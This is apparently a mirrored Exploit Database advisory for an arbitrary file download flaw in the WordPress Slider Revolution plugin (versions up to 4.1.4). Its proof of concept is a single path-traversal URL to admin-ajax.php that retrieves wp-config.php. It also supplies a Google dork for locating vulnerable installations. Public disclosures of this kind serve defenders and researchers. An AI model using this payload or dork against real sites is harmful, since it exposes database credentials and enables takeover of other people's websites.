WordPress Plugin Slider REvolution 4.1.4 – Arbitrary File Download

• Exploit Database
• 13 阅读

• 作者： Claudio Viviani
  日期： 2015-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36554/

• # Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability
  
  # Exploit Author : Claudio Viviani
  
  # Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
  
  # Software Link : Premium plugin
  
  # Dork Google: revslider.php "index of"
   
  
  # Date : 2014-07-24
  
  # Tested on : Windows 7 / Mozilla Firefox
  Linux / Mozilla Firefox
  
  
  ######################
  
  # Description
  
  Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability
  
  
  ######################
  
  # PoC
  
  http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  
  
  #####################
  
  Discovered By : Claudio Viviani
  
  http://www.homelab.it
  info@homelab.it
  homelabit@protonmail.ch
  
  https://www.facebook.com/homelabit
  https://twitter.com/homelabit
  https://plus.google.com/+HomelabIt1/
  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  
  #####################